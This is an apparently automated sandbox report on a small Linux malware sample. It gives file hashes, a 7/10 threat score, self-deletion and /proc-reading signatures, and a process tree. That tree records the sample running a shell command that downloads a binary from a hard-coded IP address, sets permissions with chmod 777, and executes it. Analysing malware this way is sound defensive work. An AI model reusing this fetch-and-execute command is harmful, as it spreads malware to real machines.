Overview

overview

7

Static

static

7

02e62eaf2c...0d7a54

ubuntu-18.04-amd64

7

Analysis

  • max time kernel
    14s
  • max time network
    130s
  • platform
    ubuntu-18.04_amd64
  • resource
    ubuntu1804-amd64-20231215-en
  • resource tags

    arch:amd64arch:i386image:ubuntu1804-amd64-20231215-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
  • submitted
    19-12-2023 22:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    02e62eaf2c61151f9de1ced19d0d7a54

  • Size

    12KB

  • MD5

    02e62eaf2c61151f9de1ced19d0d7a54

  • SHA1

    c150c1ba6cc2799ecee52dd34cece106e55e2111

  • SHA256

    bb98f1281560cf24af855d5d3eee42ae119c0b51043712c13ccd1d8201089f88

  • SHA512

    232249af4b288bda6863eccb52726a45a2aafcff34c12ac543044afcf16f71497da12b0dad8b9076e2ee85442385747f2f0b60044b36d8a6413a532af6553728

  • SSDEEP

    384:M/wK+ASlw3vFz1jXk+y6C2tUKXvVC6lqP7:C+AOw3vFzm+yh2tzvVHW7

Score
7/10

Malware Config

Signatures

  • Deletes itself 1 IoCs
  • Reads runtime system information 1 IoCs

    Reads data from /proc virtual filesystem.

Processes

  • /tmp/02e62eaf2c61151f9de1ced19d0d7a54
    /tmp/02e62eaf2c61151f9de1ced19d0d7a54
    1⤵
    • Deletes itself
    • Reads runtime system information
    PID:1540
    • /bin/sh
      sh -c "wget http://185.244.25.160/hahdshd73ahshds73/ugei1; chmod 777 *; ./ugei1 wget.x86"
      2⤵
        PID:1555
        • /usr/bin/wget
          wget http://185.244.25.160/hahdshd73ahshds73/ugei1
          3⤵
            PID:1556
          • /bin/chmod
            chmod 777 config-err-ttnlZv netplan_gvwf8xc7 snap-private-tmp ssh-lVEBGijvRrFk systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-ModemManager.service-RFbCjq systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-bolt.service-6PCYFg systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-colord.service-uJ0RLv systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-fwupd.service-vKHNVb systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-systemd-resolved.service-CPtEAB systemd-private-f51359c2c7dd4a60bcb98fcb5a2540f8-systemd-timedated.service-LoDLn9
            3⤵
              PID:1557
            • /tmp/ugei1
              ./ugei1 wget.x86
              3⤵
                PID:1558

          Network

          MITRE ATT&CK Matrix

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • memory/1540-1-0x0000000008048000-0x000000000804d608-memory.dmp

            Download